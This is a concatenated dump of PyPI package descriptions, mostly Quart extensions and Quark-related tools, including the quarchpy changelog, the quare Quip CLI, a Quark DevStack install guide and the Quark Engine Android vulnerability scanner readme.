v1.17Quarchpy run terminal runs the simple python terminal to talk to modulesScan Specific IP address for Quarch module via QIS/QPS addedUpdated performance class for new QCS testsFixed Centos QCS drive selection bugImproved QCS connection classesImproved features for QCSMinor bug fixes2.0.18QPS 1.13Iomenter drive location bugfixUnits added to stats export from QPSChanged QCS tests to work off of a python formatUpdated drive detection in QCSUpdated communication to TLS2.0.16QPS 1.112.0.15QIS v1.19.03 and QPS 1.10.12Updated debug info testSnapshots and stats from QPS functions addedCalibration updates2.0.14QPS annotations through quarchpy improvements2.0.13Python2 bug fixesUI tidy upNew custom annotations and comments QPS API2.0.12Fixed issue with array module scan over UDP outside of subnetBug fix for HD connection via USB in linuxAdded headless launch of QISAdded Shinx auto documentationFixed issue with USB command response timeout in longer QCS testsFixed issue where UDP locate parser was using the legacy header, not the quarch fieldsImproved qurchpy.run oarsing and help generationFixed syntax warnings for string literal comparisonsCalibration wait for specific module uptime and report file updates2.0.11Improved list selection for devicesFixed bug when scanning for devices within an ArrayModule detection fixes for QCS and PAM/Rev-B HDClean up of calibration switchbox code and user logging2.0.10QCS server logging cleaned upAdditional platform tests added to debug_info testCleaned up print() statements and replaced with logging callsHelp message added to quarchpy.run commandModule detection fixes for QCSImproved calibration promptsAdded initial calibration stubs for the PAMQCS improvements to linux drive enumeration tests2.0.9Significant QCS additions including power testingAdded remote switchbox to calibration utilityVarious minor bug fixes and improvements to calibration utility2.0.8Added readme.md for PyPi descriptionFixed bug in QIS when checking if QIS is runningVarious minor additions for QCS2.0.7Changes since 2.0.2Minor bug fixesCalibration ChangesQIS folder gone, QIS now in QPS onlyRun package addedUpdate quarchpy addedSystemTest improvementsUI changes, input validation, smart port select2.0.2UI Package addedConnection over TCP for python addedLogging on devicesDrive test core added2.0.0Major folder restructureAdded test center supportDetected streaming devicesAdded latest qps1.09 and qisMinor bug fixes1.8.0Tab to white space convertUpdated __init__ file to co-allign with python practicesUpdated project structureAdded documents for changes and Script LocationsDisk selection updateCompatibility with Python 3 and Linux Improved!1.7.6Fixes bug with usb connection1.7.5Fixed USB DLL CompatibilityFixed potential path issues with Qis and Qps open1.7.4Updated to QPS 1.081.7.3Additional Bug Fixes1.7.2Bug fixing timings for QIS (LINUX + WINDOWS)1.7.1Updated FIO for use with Linux and to allow arguments without valuesFixes path problem on LinuxFixes FIO on Linux1.7.0Improved compatability with Windows and Ubuntu1.6.1Updating USB ScanAdding functionality to specify OS bit architecture (windows)1.6.0custom $scan IPfixes QIS detectionimplements custom separator for stream filesBug fix - QIS Load1.5.4Updating README and LICENSE1.5.2Bug Fix - Case sensitivity issue with devices1.5.1Additional Bug Fixes1.5.0Integration with FIOAdditional QPS functionalityAdded device search timeout1.4.1Fixed the wmi error when importing quarchpy.1.4.0\n\u2014Integration with QPSsupports Iometer testingAdditional fixes for wait times1.3.4Implemented resampling and a better way to launch QIS from the script.1.3.3Implements isQisRunningImplements qisInterfaceChanges startLocalQIS to startLocalQisFixes a bug in QIS interface listDevices that didn\u2019t allow it to work with Python 31.3.2Bug Fix running QIS locally1.3.1Implements startLocalQISPacks QIS v1.6 - fixes the bugs with QIS >v1.6 and multiple modulesUpdates quarchPPM (connection_specific)Compatible with x6 PPM QIS stream.1.2.0Changes to object model"} +{"package": "quarchQCS", "pacakge-description": "No description available on PyPI."} +{"package": "quare", "pacakge-description": "quareInteract with Quip from the command line.Introductionquare allows interaction withQuipvia the command line. Whilequareis in alpha, there are some features you may find useful:Pipe the output of a command to a chat or document and format it as monospace.Archive messages by piping them into a local fileSecurely store authentication tokens for multiple Quip instances.This tool is in its early stages of development, and is subject to change (or abandonment) at any time. Use at your own risk.Installation$pipxinstallquareUsageAuthenticationStore a Quip API token (See:https://quip.com/dev/token):$quareauthToken: long_token_stringToken stored.If you have multiple Quip instances (like multiple Slack Workspaces), you can specify an alias for them. You can also pass your token directly toauth:$quaremsgauth--aliastest_server--token't1DJBQWBXHCYgh1=|2983928392|nYtRFIhV7nl4...'WhoamiTo see information about the logged in user:$quaremsgwhoami\u250cDefault\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\u2502 Name \u2502 Tests Testeri \u2502\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\u2502 Email(s) \u2502 t@testz.dev \u2502\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\u2502 Quip User ID \u2502 mRLA6Zdn3PO \u2502\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518Sending messagesThe destination may be a document or chat:$quaremsgsend--roomroom_id--content'Hello everyone!'Pipe content fromstdinMessage content can be piped fromstdin:$uname-a|quaremsgsend--roomroom_id--content'-'While Quip allows formatting messages using some markdown markup, it doesn't recognize markdown code blocks (\"```\"). To define a code block, use the--monospaceoption:$dmesg|tail-n5|quaremsgsend--roomroom_id--content'-'--monospaceReceiving messagesStream to stdoutTo stream every message appearing in the Updates tab:$quaremsgstreamStreaming updates... press Ctrl-C to exit.[Sun Jun 30 17:23:09 2019 | (Test Log) | @Tests Testeri] ok okDump the content of a chat roomTo get the last 5 messages in a chat room or document:$quaremsgget--roomroom_id--last5[Sat Jun 29 03:19:09 2019 | @Tester Testeri] This is a monologue![Sat Jun 29 16:00:12 2019 | @Tester Testeri] ok[Sat Jun 29 16:34:51 2019 | @Tester Testeri] I'm done![Sun Jun 30 17:30:14 2019 | @Tester Testeri] \ud83c\udf2e[Sun Jun 30 17:30:27 2019 | @Tester Testeri] \ud83e\udd43To get the last 2 messages as JSON:$quaremsgget-r\"IcTAAAtVxXb\"--last2--json[{\"author_id\": \"mRLA6Zdn3PO\", \"visible\": true, \"id\": \"IcderpEe8wG\", \"created_usec\": 1561849212672040, \"updated_usec\": 1561849212696571, \"text\": \"ok\", \"author_name\": \"Tester Testeri\"}, {\"author_id\": \"mRLA6Zdn3PO\", \"visible\": true, \"id\": \"IcNodg7n2Tx\", \"created_usec\": 1561851291612434, \"updated_usec\": 1561851291620308, \"text\": \"chat\", \"author_name\": \"Tester Testeri\"}]To dump the last 200 messages in a chat room into a text file:$quaremsgget--roomroom_id--last200>interesting_conversation.logTo get all messages since a datetime:$quaremsgget--roomroom_id--since2019-01-01T00:32:00Z>greppable_archive.logThe--sinceoption recognizes any date recognized bydateparser:$quaremsgget--roomroom_id--since'Monday'>this_week.log$quaremsgget--roomroom_id--since'2 months ago'>this_quarter.logEditing documentsTo append a markdown file to an existing document$quaredocappend--idxxxDoc_IDxxx--file/tmp/foo.md$cat/tmp/foo.md|quaredocappend--idxxxDoc_IDxxx--file-To append a markdown-format string to an existing document$quaredocappend--idxxxDoc_IDxxx--content'## Headline\\n\\n'DevelopmentThis work is licensed under the terms of theLGPL-3.0.ContributionsSee CONTRIBUTING.rst"} +{"package": "quarg", "pacakge-description": "Generate a command line interface with no code, and gradually add annotations for more control."} +{"package": "quark", "pacakge-description": "=====quark=====Caution=======Quark is not currently designed to work with `DevStack `_ (but it can with the instructions below). We mention this because these instructions can become invalid if and when changes are pushed to DevStack. Please also not that once Quark+Neutron+DevStack+Tempest are wired up, the Tempest tests are failing. Please watch `this Quark Github Issue `_ for updates on this.Dependencies===================`aiclib `_Database Migrations===================`Here `_Install with DevStack and Neutron=================================- Ensure you have a user already with sudo rights. If you need one, do this as root::/usr/sbin/adduser stackecho \"stack ALL=(ALL) NOPASSWD: ALL\" >> /etc/sudoers- Switch to user with sudo rights::sudo su - stack # or whatever user you already have (instead of stack)- Clone devstack::git clone https://github.com/openstack-dev/devstack- Go into devstack folder::cd devstack- Create the local.conf configuration file that DevStack needs (localrc is inside it now) with Neutron as an anabled service (NOTE: This notation is explained `here `_)::[[local|localrc]]DATABASE_PASSWORD=passwordADMIN_PASSWORD=passwordSERVICE_PASSWORD=passwordSERVICE_TOKEN=passwordRABBIT_PASSWORD=password# Enable LoggingLOGFILE=/opt/stack/logs/stack.sh.logVERBOSE=TrueLOG_COLOR=TrueSCREEN_LOGDIR=/opt/stack/logs# Pre-requisiteENABLED_SERVICES=rabbit,mysql,key# Horizon (always use the trunk)ENABLED_SERVICES+=,horizonHORIZON_REPO=https://github.com/openstack/horizonHORIZON_BRANCH=master# NovaENABLED_SERVICES+=,n-api,n-crt,n-obj,n-cpu,n-cond,n-schIMAGE_URLS+=\",https://launchpad.net/cirros/trunk/0.3.0/+download/cirros-0.3.0-x86_64-disk.img\"# GlanceENABLED_SERVICES+=,g-api,g-reg# NeutronENABLED_SERVICES+=,q-api,q-svc,q-agt,q-dhcp,q-l3,q-lbaas,q-meta,neutron# CinderENABLED_SERVICES+=,cinder,c-api,c-vol,c-sch# TempestENABLED_SERVICES+=,tempest- Remove Python's six packge::sudo rm -f /usr/lib/python2.7/dist-packages/six.py /usr/lib/python2.7/dist-packages/six.pyc# Old version of six package in /usr/lib/python2.7/dist-packages/ crashes# quark server- Install Devstack::./stack.sh- Install aiclib::sudo pip install aiclib# the reason for sudo here is if you don't you'll get permission denied when it tries to install to /usr/local/lib/python2.7/dist/packages- Install quark::cd /opt/stack #the folder where devstack installed all the servicesgit clone https://github.com/rackerlabs/quarkcd quarksudo python setup.py develop# the reason for sudo here is if you don't you'll get permission denied when it tries to install to /usr/local/lib/python2.7/dist/packages- Validate quark installed::pip freeze | grep quark# should see something like:# -e git+http://github.com/rackerlabs/quark@ff5b05943b44a44712b9fc352065a414bb2a6bf9#egg=quark-master- Now edit the /etc/neutron/neutron.conf file to setup Quark as the core plugin::vim /etc/neutron/neutron.conf# Search for line containing 'core_plugin = ' and replace it with# 'core_plugin = quark.plugin.Plugin'## Search for line containing 'service_plugins = ' and remove# 'neutron.services.l3_router.l3_router_plugin.L3RouterPlugin,' from# service plugins list- Stop Neutron by going into the screen session and going to the q-svc window and pressing ctrl-C::screen -r # or go into devstack clone and then type ./rejoin-stack.sh# press ctrl+6 to go to q-svc windowctrl+C- Go back into screen and restart neutron (q-svc window)::screen -r stack # or go into folder where you cloned devstack then type ./rejoin-stack.sh# if screen command returns 'Cannot open your terminal /dev/pts/0' execute 'sudo chmod o+rwx /dev/pts/0'# go to q-svc window (ctrl+a, 7 currently does it)# previous command that devstack used to start neutron should be in history, press up arrow key to see it- You shouldn't receive any errors. To validate Quark has started up, you can scroll up in q-svc screen window (ctrl+a, esc, page-up) and look for the following lines::DEBUG neutron.service [-] core_plugin = quark.plugin.Plugin...DEBUG neutron.service [-] QUARK.default_ipam_strategy=ANYDEBUG neutron.service [-] QUARK.default_net_strategy={}DEBUG neutron.service [-] QUARK.default_network_type=BASEDEBUG neutron.service [-] QUARK.ipam_driver=quark.ipam.QuarkIpamDEBUG neutron.service [-] QUARK.ipam_reuse_after=7200DEBUG neutron.service [-] QUARK.net_driver=quark.drivers.base.BaseDriverDEBUG neutron.service [-] QUARK.strategy_driver=quark.network_strategy.JSONStrategyGOTCHAS=======- you won't be able to create ports until you've added at least one mac_address_range (use `this `_ script to do it, changing host IP and admin password)"} +{"package": "quarkapi", "pacakge-description": "quark-api-python\u0440\u045f\u201c\u0459 The Quark API for Python developers."} +{"package": "quark-engine", "pacakge-description": "Quark Script - Dig Vulnerabilities in the BlackBoxInnovative & InteractiveThe goal of Quark Script aims to provide an innovative way for mobile security researchers to analyze orpentestthe targets.Based on Quark, we integrate decent tools as Quark Script APIs and make them exchange valuable intelligence to each other. This enables security researchers tointeractwith staged results and performcreativeanalysis with Quark Script.Dynamic & Static AnalysisIn Quark script, we integrate not only static analysis tools (e.g. Quark itself) but also dynamic analysis tools (e.g.objection).Re-Usable & SharableOnce the user creates a Quark script for specific analysis scenario. The script can be used in another targets. Also, the script can be shared to other security researchers. This enables the exchange of knowledges.More APIs to comeQuark Script is now in a beta version. We'll keep releasing practical APIs and analysis scenarios.See API documenthere.CWE ShowcasesCWE-020Improper Input ValidationCWE-022Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')CWE-023Relative Path TraversalCWE-073External Control of File Name or PathCWE-078Improper Neutralization of Special Elements used in an OS CommandCWE-088Improper Neutralization of Argument Delimiters in a CommandCWE-089Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')CWE-094Improper Control of Generation of Code ('Code Injection')CWE-117Improper Output Neutralization for LogsCWE-295Improper Certificate ValidationCWE-312Cleartext Storage of Sensitive InformationCWE-319Cleartext Transmission of Sensitive InformationCWE-327Use of a Broken or Risky Cryptographic AlgorithmCWE-328Use of Weak HashCWE-338Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)CWE-489Active Debug CodeCWE-502Deserialization of Untrusted DataCWE-532Insertion of Sensitive Information into Log FileCWE-601URL Redirection to Untrusted Site ('Open Redirect')FileCWE-749Exposed Dangerous Method or FunctionCWE-780Use of RSA Algorithm without OAEPCWE-798Use of Hard-coded CredentialsCWE-921Storage of Sensitive Data in a Mechanism without Access ControlCWE-925Improper Verification of Intent by Broadcast ReceiverCWE-926Improper Export of Android Application ComponentsCWE-940Improper Verification of Source of a Communication ChannelQuick StartIn this section, we will show how to detect CWE-798 with Quark Script.Step 1: Environments RequirementsQuark requires Python 3.8 or above.Step 2: Install Quark EngineInstall Quark Engine by running:$pip3install-Uquark-engineStep 3: Prepare Quark Script, Detection Rule and the Sample FileGet the CWE-798 Quark Script and the detection rulehere.Get the sampe file (ovaa.apk)here.Put the script, detection rule, and sample file in the same directory.Edit accordingly to the file names:SAMPLE_PATH=\"ovaa.apk\"RULE_PATH=\"findSecretKeySpec.json\"# Now you are ready to run the script!Step 4: Run the script$python3CWE-798.py# You should now see the detection result in the terminal.Foundhard-codedAESkey49u5gh249gh24985ghf429gh4ch8f23fCheck thedocumentfor more examples.AcknowledgmentsThe Honeynet ProjectGoogle Summer Of CodeQuark-Engine has been participating in the GSoC under the Honeynet Project!2021:YuShiang Dang:New Rule Generation Technique & Make Quark Everywhere Among Security Open Source ProjectsSheng-Feng Lu:Replace the core library of Quark-EngineStay tuned for the upcoming GSoC! Join theHoneynet Slack chatfor more info.Core Values of Quark Engine TeamWe lovebattle fields. We embraceuncertainties. We challengeimpossibles. Werethinkeverything. We change the way people think. And the most important of all, we benefit ourselves by benefit othersfirst."} +{"package": "quark_hash", "pacakge-description": "UNKNOWN"} +{"package": "quarkit", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quarks2-fractal", "pacakge-description": "No description available on PyPI."} +{"package": "quarkserver", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quarksmart", "pacakge-description": "No description available on PyPI."} +{"package": "quark-sphinx-theme", "pacakge-description": "Quark: a Sphinx theme for QTextBrowserQuark is a Sphinx theme specifically designed to look and work well within the\nlimitations of the Qt toolkit'sQTextBrowser.This theme was originally designed for the bundled manual ofSpeedCrunch.InstallationInstall the theme:$pipinstallquark-sphinx-themeEnable it in yourconf.pyhtml_theme='quark'# generate QTextBrowser-compatible HTML4 instead of something newerhtml4_writer=TrueOptional: enable improved design for some elements by rewriting HTML:# To enable more QTextBrowser-compatible HTML generation:extensions=['quark_sphinx_theme.ext.html_rewrite']Releasingset package version inquark_sphinx_theme/__init__.pyupdate changelogtag release commit withv, e.g.v0.6.0Changelogquark-sphinx-theme 0.6.0(2020-04-15)Bump minimum required Python version to 3.5.Bump minimum required Sphinx version to 1.8.Fixhtml_rewriteextension to properly load on other HTML-based\nbuilders (e.g. theqthelpbuilder).Change the way thehtml_rewriteextension modifies the HTML builder to\nbe less invasive.Add asphinx.html_themesentry point to allow loading the theme\nautomatically, without settinghtml_theme_path.Miscellaneous tooling changes:The build system was changed from setuptools (setup.py) to flit.The CI pipeline was expanded to catch more issues.quark-sphinx-theme 0.5.1(2018-04-30)Sphinx 1.7 compatibility:An internal refactoring broke the integration tests. This has been fixed.Every commit is now tested on every supported Python and Sphinx version\nusing Gitlab CI.The entire test suite is regularly re-run with the latest Sphinx version to\nmore consistently discover compatibility issues.quark-sphinx-theme 0.5.0(2017-06-05)Sphinx 1.6 compatibility:A change in Sphinx's HTML code broke the HTML rewriting extensions (see\nissue #1).A change in thecss_filesvariable in the basic theme's template broke\ntheextra_css_filestheme setting.quark-sphinx-theme 0.4.1(2016-11-22)Fixpython_requiresin setup.py.quark-sphinx-theme 0.4(2016-10-18)Add an explicit dependency on Sphinx.Renamequark_html_rewrite_featurestoquark_html_features.Addquark_html_disabled_featuresto explicitly turn off certain rewrite\nfeatures.Style changes:More visually appealing code blocks on full browsers.Add styling for compact lists produced by::hlistdirective.Correctly set width for topic blocks.Clean up definition list margins.quark-sphinx-theme 0.3.2 \"I'll get it right some day\"(2016-05-23)Include a copy of the lovelace style for compatibility with Pygments < 2.1.quark-sphinx-theme 0.3.1(2016-05-23)Skip CSS syntax tests if tinycss isn't available.Make sure to include theme itself.Include test/util.py in source packages.quark-sphinx-theme 0.3(2016-05-22)Removehide_sidebar_in_indexoption.Fix styling of index pages.Thequark_sphinx_theme.ext.html_compatextension has been renamed toquark_sphinx_theme.ext.html_rewrite. The old name remains supported for\nbackwards compatibility.Thehtml_rewriteextension now supports wrapping admonitions in tables,\nallowing for more styling options. The theme has been updated to take\nadvantage of this. Admonitions, topics, and sidebars look very different and\nmuch better. Ifhtml_rewriteis not enabled, a fallback style will be\nused for these.html_rewritesupports wrapping literal blocks in tables. If enabled,\nthis provides better styling for Pygments styles with non-white backgrounds.Smaller design changes:Don't use background color on code elements in headings and normal links.Display terms in definition lists in bold.Remove left and top margins for definition list bodies.Switch default code color scheme to 'lovelace'.quark-sphinx-theme 0.2.1(2016-03-02)Change license to 2-clause BSD (in practice, it's the same thing).quark-sphinx-theme 0.2.0(2016-02-28)Addquark_sphinx_theme.ext.html_compatextension.Add styling for citations, footnotes, table captions, andrubricdirectives.quark-sphinx-theme 0.1.2(2016-02-27)Fix compatibility with Jinja2 2.3.quark-sphinx-theme 0.1.1(2016-02-24)Fix spacing of navigation links.quark-sphinx-theme 0.1.0(2016-02-24)Initial release."} +{"package": "quarkstudio", "pacakge-description": "123"} +{"package": "quarkz", "pacakge-description": "Seehttps://github.com/quarkz-encryption/quarkz"} +{"package": "quarrel", "pacakge-description": "querulous_quarrelNamed for a lovely groups of sparrows that happened to be flying by. A library\nthat makes writing and executing queries a little easier for data scientists.quarrelusesconcentricandwaddleand is proudly sponsored by the m&a\nteam at cscgh.installationcd /path/to/repo\npip install quarrelquick startcreate a config fileoracle:\n host: oracle.example.com\n user: scott\n password: tiger\n sid: xeinitialize concentric with the config file from (1)from concentric.managers import setup_concentric\n\n setup_concentric('/path/to/oracle.yml')(optional) initialize the sql template directoriesfrom quarrel.settings import setup_quarrel\n setup_quarrel('/path/to/jinja2/sql/templates', '/path/to/jinja2/sql/queries')query the databasefrom quarrel.raw import query\n results = query('oracle', 'select sysdate from dual')raw results -- get raw results from the dbapi connectionquarrel.rawallows you to get the tuples as they were returned by the\nunderlying dbapi connection. the header will be the cursor.description\nreturned from the query, and the results will be the list of tuples returned\nby the query.> from quarrel.raw import query\n> header, results = query('oracle', 'select sysdate d from dual')\n> print(header[0][0])\nD\n> print(results)\n[(datetime.datetime(2022, 6, 26, 15, 10, 59),)]cooked results -- get results as a list of dictsquarrel.cookedallows you to get alistofdicts which is slightly easier to\nunderstand and work with but can be substantially slower as python will\nconstruct a dict per row that is returned. Each key of thedictwill be\nthelower-cased column namespecified in the query.> from quarrel.cooked import query\n> results = query('oracle', 'select sysdate d from dual')\n> print(results)\n[{'d': datetime.datetime(2022, 6, 26, 15, 14, 12)}]sqlalchemy resultsquarrel.sqlalchemyallows you to get alistofdicts as well. However,\nit uses sqlalchemy under the hood. This can be useful when you need sql alchemy's\nconnection pooling features.> from quarrel.sqlalchemy import query\n> results = query('oracle', 'select sysdate d from dual')\n> print(results)\n[{'d': datetime.datetime(2022, 6, 26, 15, 14, 12)}]pandas resultsquarrel.pandasallows you to get a dataframe using either the dbapi\nconnection or a sqlalchemy connection.> from quarrel.pandas import query\n> results = query('oracle', 'select sysdate d from dual')\n> print(results)\n d\n0 2022-06-26 15:20:34\n\n> from quarrel.pandas import query_alchemy\n> results = query_alchemy('oracle', 'select sysdate d from dual')\n> print(results)\n d\n0 2022-06-26 15:20:34In order to use pandas, make sure you installpandassupport using\nthepandasextrapip install quarrel[pandas]"} +{"package": "quarrel-solver", "pacakge-description": "quarrel-solverTool forQuarrel(and other word games)SummaryProvides word game-related tools, and can be configured with custom settings, letter scores, and wordlists.Works on Python 3.6 and above. Tested on Windows 10.ContentsSummaryContentsThequarrel-solverlibraryDirect executionExample caseSettingsThequarrel-solverlibraryInstall thequarrel-solverlibrary to use all functionality in your own projects.Remember to always use the latest version, as not all bugfixes are documented!$py-mpipinstall--upgradequarrel-solver\n$py>>>fromquarrel_solverimportbuild_settings,Ruleset>>>q=Ruleset(...settings=build_settings(...{'max_words_len':8}...)...)>>>print(...q.solve_str('wetodlnm')...)---query:delmnotw(8letters)---8letters-18pointsMELTDOWN5letters-14pointsMOWED4letters-12pointsMEWL3letters-10pointsMEW,MOW,WEM2letters-6pointsEW,OW,WE,WO>>>_Note: for thepip installcommand, you can usequarrel-solverwith a hyphen, orquarrel_solverwith an underscore. When importing the module in Python or running it from the commandline, youMUSTuse an underscore.For a more informed walkthrough, please see theexample casebelow.Direct execution$py-mquarrel_solverIf you call the library directly, you'll be greeted with a commandline program. Its input screen looks like this:>_Type your letters into the field, pressEnter, and wait for the program to calculate the best words. Once it's done, choose one from the list that corresponds with the number of letters you have available, or the next lowest. See the example below to find out why you might not need to use all of your spaces.Example caseHere's an example using the default program settings. Our situation is the following:We're playingQuarrel, and thus we get 8 letters.Our letters arewetodlnm.We have 7 spaces to use.After installing the library, we'll open a commandline and run the program.Since we know we don't need words longer than 8 letters, we can minimise loading time by configuring the program to only calculate for words of that length. We can do this by passing our desired settings as command arguments:$py-mquarrel_solver--max_words_len8Note: this has the same effect as creating asettings.jsonfile, then running the command from the same directory:// settings.json\n{\"max_words_len\": 8}## from folder with settings.json$py-mquarrel_solverWhichever way the program is run, it will have to load a wordlist. Once it finishes loading, we can input our letters and pressEnter.>wetodlnm---query:delmnotw(8letters)---8letters-18pointsMELTDOWN5letters-14pointsMOWED4letters-12pointsMEWL3letters-10pointsMEW,MOW2letters-6pointsOW,WE,WO>_This tells us that the anagram isMELTDOWN, but we can't make that word because we can only use 7 letters. In this case, our best word isMOWED(14 points). Based on this output, we also know that our opponent cannot score higher than us without all 8 spaces.Note: a word likeLETDOWNscores the same number of points asMOWED, but isn't recognised as a \"best word\" in this case. This is because when words are tied for points, the program will choose the word/s with the fewest letters.The fewer letters your word has, the faster you can write it into your game. This is especially important inQuarrel, as the tiebreaker for equal points is input speed.SettingsUpon being run directly, the program will automatically generate (or look for) asettings.jsonfile in the directory which the command is run from. This file contains the program's settings, which can be changed to suit your needs.When usingquarrel-solver, you should can pass adictwith any of the following keys intobuild_settingsto generate a full settings object, then pass the output to aRulesetto create a new instance. Here are all the currently supported settings:SettingDefaultDescriptionall_lowercasefalseDisplays output in lowercase letters. The default setting displays capital letters to mimic the style of word games likeScrabbleandQuarrel. However, some people may find lowercase output more readable.allow_repeatsfalseDetermines whether letters can be used more than once. Change this according to your word game's rules; for example,Scrabbletiles can only be used once in a single word, whereasNew York Times'sSpelling Beeallows the reuse of letters.display_debugfalseShows the program's inner workings whilst calculating. Note that this may negatively affect performance on certain devices or IDEs.exclude_words[]List of words that the program will never output.ignore_scoresfalseDetermines whether point values for words are considered, in which case only the highest-scoring words are displayed. If you don't care about scoring, turn this off to see all words.include_words[]List of additional words for the wordlist.letter_scores\"quarrel\"Determines the letter scoring system used for calculating points. The value here is passed intobuild_letter_scores(), and defaults back if invalid.max_words_lenlongest length in wordlistDetermines the maximum word length the program will calculate for.min_words_len2Determines the minimum word length the program will calculate for.settings_path(commandline only)NonePath to the settings file.When running directly:To change your settings, do one of the following:Opensettings.jsonin a text editor and change any values. Make sure to save the file once you're done.Pass the setting as a command argument like this:--setting_name valueThis will automatically update the settings file, if applicable.$py-mquarrel_solver--display_debugtrue--max_words_len8Ifsettings.jsonis not present in your folder, try running the program and letting it fully load. It should then create the file.After savingsettings.json, the program will not change if it's already running. Close the program and run it again to use the changed settings."} +{"package": "quarrierpackage", "pacakge-description": "test quarrier"} +{"package": "quarry", "pacakge-description": "Quarry is a Python library that implements theMinecraft protocol. It allows\nyou to write special purpose clients, servers and proxies.InstallationUsepipto install quarry:$pipinstallquarryFeaturesSupports Minecraft versions 1.7 through 1.19.2Supports Python 3.7+Built upontwistedandcryptographyExposes base classes and hooks for implementing your own client, server or\nproxyImplements many Minecraft data types, such as NBT, Anvil, chunk sections,\ncommand graphs and entity metadataImplements the design of the protocol - packet headers, modes, compression,\nencryption, login/session, etc.Implements all packets in \u201cinit\u201d, \u201cstatus\u201d and \u201clogin\u201d modesDoesnotimplement most packets in \u201cplay\u201d mode - it is left up to you to\nhook and implement the packets you\u2019re interested in"} +{"package": "quarry-io", "pacakge-description": "UNKNOWN"} +{"package": "quart-admin", "pacakge-description": "Quart adminA tool to create quart projects faster with a scalable setupUsageCreating peojectquart-adminstartproject--name\"project name\"Creating app(inside project)quart-adminstartapp--name\"app name\"Run the app locallypythonapp.pystart"} +{"package": "quart-auth", "pacakge-description": "Quart-Auth is an extension forQuartto provide for secure cookie\nauthentication (session management). It allows for a session to be\nlogged in, authenticated and logged out.UsageTo use Quart-Auth with a Quart app you have to create an QuartAuth and\ninitialise it with the application,app=Quart(__name__)QuartAuth(app)or via the factory pattern,auth_manager=QuartAuth()defcreate_app():app=Quart(__name__)auth_manager.init_app(app)returnappIn addition you will need to configure Quart-Auth, which defaults to\nthe most secure. At a minimum you will need to set secret key,app.secret_key=\"secret key\"# Do not use this keywhich you can generate via,>>>importsecrets>>>secrets.token_urlsafe(16)Tou may also need to disable secure cookies to use in development, see\nconfiguration below.With QuartAuth initialised you can use thelogin_requiredfunction to decorate routes that should only be accessed by\nauthenticated users,fromquart_authimportlogin_required@app.route(\"/\")@login_requiredasyncdefrestricted_route():...If no user is logged in, anUnauthorizedexception is raised. To catch it,\ninstall an error handler,@app.errorhandler(Unauthorized)asyncdefredirect_to_login(*_:Exception)->ResponseReturnValue:returnredirect(url_for(\"login\"))You can also use thelogin_user, andlogout_userfunctions to\nstart and end sessions for a specificAuthenticatedUserinstance,fromquart_authimportAuthUser,login_user,logout_user@app.route(\"/login\")asyncdeflogin():# Check Credentials here, e.g. username & password....# We'll assume the user has an identifying ID equal to 2login_user(AuthUser(2))...@app.route(\"/logout\")asyncdeflogout():logout_user()...The user (authenticated or not) is available via the globalcurrent_userincluding within templates,fromquartimportrender_template_stringfromquart_authimportcurrent_user@app.route(\"/\")asyncdefuser():returnawaitrender_template_string(\"{{ current_user.is_authenticated }}\")ContributingQuart-Auth is developed onGitHub. You are very welcome to\nopenissuesor\nproposepull requests.TestingThe best way to test Quart-Auth is with Tox,$pipinstalltox$toxthis will check the code style and run the tests.HelpThe Quart-Authdocumentationis the best places to\nstart, after that try searchingstack overflowor ask for helpon gitter. If you still\ncan\u2019t find an answer pleaseopen an issue."} +{"package": "quart_babel", "pacakge-description": "Quart BabelImplements i18n and l10n support for Quart. This is based on the Pythonbabelmodule as well aspytzboth of which are installed automatically\nfor you if you install this library.The original code for this extension was taken from Flask-Babel and Flask-BabelPlus.\nFlask-Babel can be foundhereand Flask-BabelPlus can be foundhereInstallationInstall the extension with the following command:$ pip3 install quart-babelUsageTo use the extension simply import the class wrapper and pass the Quart app\nobject back to here. Do so like this:from quart import Quart\nfrom quart_babel import Babel \n\napp = Quart(__name__)\nbabel = Babel(app)DocumentationThe for Quart-Babel and is availablehere."} +{"package": "quart-bcrypt", "pacakge-description": "Quart-BcryptQuart-Bcrypt is a Quart extension that provides bcrypt hashing utilities for\nyour application. Orginal code from Flash-Bcrypt, which can be found athttps://github.com/maxcountryman/flask-bcryptDue to the recent increased prevelance of powerful hardware, such as modern\nGPUs, hashes have become increasingly easy to crack. A proactive solution to\nthis is to use a hash that was designed to be \"de-optimized\". Bcrypt is such\na hashing facility; unlike hashing algorithms such as MD5 and SHA1, which are\noptimized for speed, bcrypt is intentionally structured to be slow.For sensitive data that must be protected, such as passwords, bcrypt is an\nadvisable choice.InstallationInstall the extension with the following command:$ pip3 install quart-bcryptUsageTo use the extension simply import the class wrapper and pass the Quart app\nobject back to here. Do so like this:from quart import Quart\nfrom quart_bcrypt import Bcrypt\n\napp = Quart(__name__)\nbcrypt = Bcrypt(app)Two primary hashing methods are now exposed by way of the bcrypt object. Note that you\nneed to use decode('utf-8') on generate_password_hash().pw_hash = bcrypt.generate_password_hash('hunter2').decode('utf-8')\nbcrypt.check_password_hash(pw_hash, 'hunter2') # returns TrueDocumentationView documentation athttps://quart-bcrypt.readthedocs.io/en/latest/"} +{"package": "quart-compress", "pacakge-description": "Quart-CompressQuart-Compress allows you to easily compress yourQuartapplication's responses with gzip.The preferred solution is to have a server (likeNginx) automatically compress the static files for you. If you don't have that option Quart-Compress will solve the problem for you.How it worksQuart-Compress both adds the various headers required for a compressed response and gzips the response data. This makes serving gzip compressed static files extremely easy.Internally, every time a request is made the extension will check if it matches one of the compressible MIME types and will automatically attach the 